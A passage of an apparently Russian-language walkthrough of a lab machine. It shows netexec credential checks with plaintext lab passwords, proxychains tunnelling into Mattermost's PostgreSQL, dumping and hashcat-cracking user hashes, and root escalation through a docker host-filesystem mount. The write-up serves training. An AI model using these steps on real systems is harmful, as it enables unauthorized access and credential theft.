\u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u0431\u0440\u0443\u0442\u0438\u043b\u0441\u044f, \u043d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u043c \u0434\u043b\u044f <strong>\u0425\u0443\u0430\u043d\u0430<\/strong>, \u043d\u0430\u0441 \u0436\u0434\u0435\u043c \u043d\u0435\u0443\u0434\u0430\u0447\u0430.<\/p>\n<p>\u0421 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u0432 \u0430\u0434\u043c\u0438\u043d\u043a\u0443.<\/p>\n<p>\u041f\u0435\u0440\u0435\u0439\u0434\u044f \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u043e\u0432\u044b\u0439 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/677\/bd8\/7c9\/677bd87c9f5c35ef3136505e9c5b4931.png\" width=\"485\" height=\"189\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/677\/bd8\/7c9\/677bd87c9f5c35ef3136505e9c5b4931.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/677\/bd8\/7c9\/677bd87c9f5c35ef3136505e9c5b4931.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0412 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u044c.<\/p>\n<p><a href=\"http:\/\/code.unintended.vl\/juan\/home-backup\/src\/branch\/main\/.bash_history\" rel=\"noopener noreferrer nofollow\"><strong>http:\/\/code.unintended.vl\/juan\/home-backup\/src\/branch\/main\/.bash_history<\/strong><\/a><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/222\/d5c\/2e9\/222d5c2e999544ce3810235173af1576.png\" width=\"1127\" height=\"422\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/222\/d5c\/2e9\/222d5c2e999544ce3810235173af1576.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/222\/d5c\/2e9\/222d5c2e999544ce3810235173af1576.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0447\u0442\u043e \u0443\u0447\u0435\u0442\u043a\u0430 \u0432\u0430\u043b\u0438\u0434\u043d\u0430\u044f.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;shares<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/190\/bce\/f01\/190bcef011d68dcafb7f10f6b40e55db.png\" width=\"1100\" height=\"187\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/190\/bce\/f01\/190bcef011d68dcafb7f10f6b40e55db.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/190\/bce\/f01\/190bcef011d68dcafb7f10f6b40e55db.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 <strong>juan<\/strong>.<\/p>\n<p><strong>netexec ldap 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;query &#171;(sAMAccountName=juan)&#187; <\/strong> <\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e41\/597\/8fd\/e415978fdfdbf6eca3b4de9eb4571f73.png\" width=\"1098\" height=\"553\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e41\/597\/8fd\/e415978fdfdbf6eca3b4de9eb4571f73.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e41\/597\/8fd\/e415978fdfdbf6eca3b4de9eb4571f73.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0425\u0443\u0430\u043d \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u0433\u0440\u0443\u043f\u043f\u0435 <strong>Web<\/strong> <strong>Developers<\/strong>.<\/p>\n<p><strong>netexec ldap 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;query &#171;(sAMAccountName=abbie)&#187; &#171;&#187;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/947\/be2\/85a\/947be285ab6c1ddc5eea8874d26ba33e.png\" width=\"1098\" height=\"564\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/947\/be2\/85a\/947be285ab6c1ddc5eea8874d26ba33e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/947\/be2\/85a\/947be285ab6c1ddc5eea8874d26ba33e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p><strong>\u042d\u0431\u0431\u0438<\/strong> \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0433\u0440\u0443\u043f\u043f\u0435 <strong>Backup Operators<\/strong>.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b.<\/p>\n<p><strong>netexec ldap 10.13.38.57 -u &#8216;juan&#8217; -p &#8216;theJUANman2019&#8217; &#8212;query &#171;(objectCategory=computer)&#187; &#171;&#187;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/562\/81a\/564\/56281a564a5945ba70966551298adffe.png\" width=\"1107\" height=\"616\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/562\/81a\/564\/56281a564a5945ba70966551298adffe.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/562\/81a\/564\/56281a564a5945ba70966551298adffe.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0412\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0443 \u043d\u0430\u0441 \u0442\u0440\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435.<\/p>\n<p>\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u043f\u043e\u0434 <strong>\u0425\u0443\u0430\u043d\u043e\u043c<\/strong>, \u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u0441\u044f \u0438 \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433.<\/p>\n<p><strong>ssh -l juan@unintended.vl web.unintended.vl<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/96b\/29b\/8bc\/96b29b8bc04d88b7c518ffb1af5df765.png\" width=\"945\" height=\"523\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/96b\/29b\/8bc\/96b29b8bc04d88b7c518ffb1af5df765.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/96b\/29b\/8bc\/96b29b8bc04d88b7c518ffb1af5df765.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9a0\/317\/541\/9a03175411598078872b00c7ab580294.png\" width=\"831\" height=\"211\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9a0\/317\/541\/9a03175411598078872b00c7ab580294.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9a0\/317\/541\/9a03175411598078872b00c7ab580294.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> \u041d\u0438\u043a\u0430\u043a\u0438\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 <strong>sudo<\/strong> \u043d\u0435\u0442.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eaa\/6c9\/416\/eaa6c94162ea703a763375b1e7351a8c.png\" width=\"505\" height=\"63\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/eaa\/6c9\/416\/eaa6c94162ea703a763375b1e7351a8c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eaa\/6c9\/416\/eaa6c94162ea703a763375b1e7351a8c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043d\u0430 <strong>Mattermost<\/strong>.<\/p>\n<p><strong>sudo proxychains4 nmap -sT -Pn  127.0.0.1 -p8065<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ee5\/49e\/f11\/ee549ef118a1c3d884f89eced681ca9c.png\" width=\"624\" height=\"260\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/ee5\/49e\/f11\/ee549ef118a1c3d884f89eced681ca9c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ee5\/49e\/f11\/ee549ef118a1c3d884f89eced681ca9c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c <strong>FoxyProxy<\/strong>.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/028\/679\/506\/028679506a643fa1ee1ee77bc0d86265.png\" width=\"1151\" height=\"643\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/028\/679\/506\/028679506a643fa1ee1ee77bc0d86265.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/028\/679\/506\/028679506a643fa1ee1ee77bc0d86265.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p><a href=\"http:\/\/127.0.0.1:8065\/login\" rel=\"noopener noreferrer nofollow\"><strong>http:\/\/127.0.0.1:8065\/login<\/strong><\/a><\/p>\n<p>\u0417\u0430\u0445\u043e\u0434\u0438\u043c \u0432 <strong>Mattermost <\/strong>\u043f\u043e\u0434 \u0443\u0447\u0435\u0442\u043a\u043e\u0439 <strong>\u0425\u0443\u0430\u043d\u0430 <\/strong> \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0443.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e41\/11a\/5b7\/e4111a5b7983d90feca2891edd7648dd.png\" width=\"634\" height=\"366\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e41\/11a\/5b7\/e4111a5b7983d90feca2891edd7648dd.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e41\/11a\/5b7\/e4111a5b7983d90feca2891edd7648dd.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041a\u0440\u043e\u043c\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u044f \u043e \u043f\u0430\u0440\u043e\u043b\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0447\u0442\u043e \u0432 \u0440\u0430\u0431\u043e\u0442\u0435 \u0435\u0441\u0442\u044c \u0431\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 <strong>PostgreSQL<\/strong>,<strong> <\/strong>\u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432 \u0434\u043e\u043a\u0435\u0440\u0435.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fa7\/1b0\/beb\/fa71b0beb7cd25ad2d6a89a7a4e4da05.png\" width=\"636\" height=\"367\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/fa7\/1b0\/beb\/fa71b0beb7cd25ad2d6a89a7a4e4da05.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fa7\/1b0\/beb\/fa71b0beb7cd25ad2d6a89a7a4e4da05.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0438\u0449\u0435\u043c \u044d\u0442\u0443 \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>ps aux  | grep postgres<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/532\/e0a\/461\/532e0a4611c731d4ff960491c8590867.png\" width=\"969\" height=\"254\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/532\/e0a\/461\/532e0a4611c731d4ff960491c8590867.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/532\/e0a\/461\/532e0a4611c731d4ff960491c8590867.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p><strong>sudo proxychains4 nmap 172.18.0.3 -p5432 -Pn -sT<\/strong><\/p>\n<p>\u041f\u043e\u0440\u0442 \u043e\u0442\u043a\u0440\u044b\u0442, \u0437\u043d\u0430\u0447\u0438\u0442 \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f.<\/p>\n<p><strong>sudo proxychains4 psql -h 172.18.0.3 -d mattermost -U mmuser<\/strong><\/p>\n<p>\u0421\u0432\u0435\u0440\u044f\u0441\u044c \u0441 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0435\u0439 <a href=\"https:\/\/github.com\/mattermost\/docker\/blob\/main\/env.example\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/mattermost\/docker\/blob\/main\/env.example<\/a> \u043c\u043e\u0436\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0438\u043c\u044f \u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043a \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/98e\/3a0\/31c\/98e3a031c5afa94e5f4f2444d26fb144.png\" width=\"345\" height=\"121\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/98e\/3a0\/31c\/98e3a031c5afa94e5f4f2444d26fb144.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/98e\/3a0\/31c\/98e3a031c5afa94e5f4f2444d26fb144.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c23\/72e\/63b\/c2372e63bec1b4babe2ba3c53a38641d.png\" width=\"641\" height=\"178\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c23\/72e\/63b\/c2372e63bec1b4babe2ba3c53a38641d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c23\/72e\/63b\/c2372e63bec1b4babe2ba3c53a38641d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0418\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u043c \u043d\u0443\u0436\u043d\u044b\u0435 \u043d\u0430\u043c \u0434\u0430\u043d\u043d\u044b\u0435.<\/p>\n<p><strong>SELECT username,password,authdata,authservice,email,nickname,firstname,lastname,roles FROM users;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1d5\/8db\/2c4\/1d58db2c4f6cc07a6e86cc5a03550946.png\" width=\"1090\" height=\"150\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/1d5\/8db\/2c4\/1d58db2c4f6cc07a6e86cc5a03550946.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1d5\/8db\/2c4\/1d58db2c4f6cc07a6e86cc5a03550946.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0423 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0442\u0440\u0438 \u0445\u0435\u0448\u0430, \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043c \u0438\u0445 \u0432 \u0444\u0430\u0439\u043b.<\/p>\n<p><strong>nano hashes.txt<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f62\/974\/b42\/f62974b42ab9bd141c660e81cbe018b2.png\" width=\"503\" height=\"77\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f62\/974\/b42\/f62974b42ab9bd141c660e81cbe018b2.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f62\/974\/b42\/f62974b42ab9bd141c660e81cbe018b2.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0423\u0437\u043d\u0430\u0435\u043c \u0442\u0438\u043f \u0445\u0435\u0448\u0430.<\/p>\n<p><strong>hashid hashes.txt<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/831\/02c\/d60\/83102cd600c23dc244c64074325805b3.png\" width=\"593\" height=\"234\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/831\/02c\/d60\/83102cd600c23dc244c64074325805b3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/831\/02c\/d60\/83102cd600c23dc244c64074325805b3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0412\u0441\u043f\u043e\u043c\u0438\u043d\u0430\u044f \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443 \u0438\u0437 \u0447\u0430\u0442\u0430 \u043a\u0430\u043a \u0434\u043e\u043b\u0436\u0435\u043d \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0441\u043e\u0437\u0434\u0430\u0435\u043c \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c <strong>cook<\/strong>.<\/p>\n<p><strong>go install -v <\/strong><a href=\"mailto:github.com\/glitchedgitz\/cook\/v2\/cmd\/cook@latest\" rel=\"noopener noreferrer nofollow\"><strong>github.com\/glitchedgitz\/cook\/v2\/cmd\/cook@latest<\/strong><\/a><\/p>\n<p><strong>\/home\/kali\/go\/bin\/cook abbie,spencer,Abbie,Spencer,theabbs 1920-2024 &gt; abbie.wordlist<\/strong><\/p>\n<p>\u0418 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c <strong>hashcat<\/strong>.<\/p>\n<p><strong>hashcat -m3200 hashes.txt abbie.wordlist<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ab7\/c2f\/7af\/ab7c2f7af747dffa8f6f7105d355f3e3.png\" width=\"589\" height=\"263\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/ab7\/c2f\/7af\/ab7c2f7af747dffa8f6f7105d355f3e3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ab7\/c2f\/7af\/ab7c2f7af747dffa8f6f7105d355f3e3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043d\u043e\u0432\u0430 \u0437\u0430\u0439\u0434\u0435\u043c \u0432 <strong>Mattermost<\/strong>, \u043d\u043e \u0443\u0436\u0435 \u043f\u043e\u0434 \u043d\u043e\u0432\u043e\u0439 \u0443\u0447\u0435\u0442\u043a\u043e\u0439, \u043d\u0430\u0439\u0434\u0435\u043c \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0443 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043d\u043e\u0432\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/257\/b56\/ef9\/257b56ef9829b8198447ced93ec5079c.png\" width=\"960\" height=\"393\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/257\/b56\/ef9\/257b56ef9829b8198447ced93ec5079c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/257\/b56\/ef9\/257b56ef9829b8198447ced93ec5079c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0443\u0447\u0435\u0442\u043a\u0443.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u abbie -p &#8216;Hiu8sy8SA8h2&#8217; &#8212;shares<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5e7\/cbf\/ae0\/5e7cbfae0e090bd1d8270b12a51de438.png\" width=\"1096\" height=\"180\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/5e7\/cbf\/ae0\/5e7cbfae0e090bd1d8270b12a51de438.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5e7\/cbf\/ae0\/5e7cbfae0e090bd1d8270b12a51de438.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443.<\/p>\n<p><strong>ssh -l abbie@unintended.vl backup.unintended.vl<\/strong><\/p>\n<p><strong>\u042d\u0431\u0431\u0438<\/strong> \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0433\u0440\u0443\u043f\u043f\u0435 <strong>Docker<\/strong>, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u0435\u0433\u043a\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 <strong>root<\/strong> \u043d\u0430 \u0445\u043e\u0441\u0442\u0435, \u0441\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u043e\u0440\u043d\u0435\u0432\u0443\u044e \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0432 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0435.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9e5\/3ad\/b6e\/9e53adb6ef52bc6c922ea81f271e32a1.png\" width=\"1086\" height=\"53\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9e5\/3ad\/b6e\/9e53adb6ef52bc6c922ea81f271e32a1.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9e5\/3ad\/b6e\/9e53adb6ef52bc6c922ea81f271e32a1.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u044b.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f2c\/7d9\/d81\/f2c7d9d81c854a4f55c03567c778e42d.png\" width=\"537\" height=\"69\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f2c\/7d9\/d81\/f2c7d9d81c854a4f55c03567c778e42d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f2c\/7d9\/d81\/f2c7d9d81c854a4f55c03567c778e42d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p><strong>docker run -v \/:\/mnt &#8212;rm -it python:3.11.2-slim chroot \/mnt sh<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c78\/344\/b15\/c78344b1560d1196d90ce441d97f486d.png\" width=\"763\" height=\"53\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c78\/344\/b15\/c78344b1560d1196d90ce441d97f486d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c78\/344\/b15\/c78344b1560d1196d90ce441d97f486d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0417\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/90b\/693\/c32\/90b693c321afc8ea6917293d9b84d8e0.png\" width=\"556\" height=\"282\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" 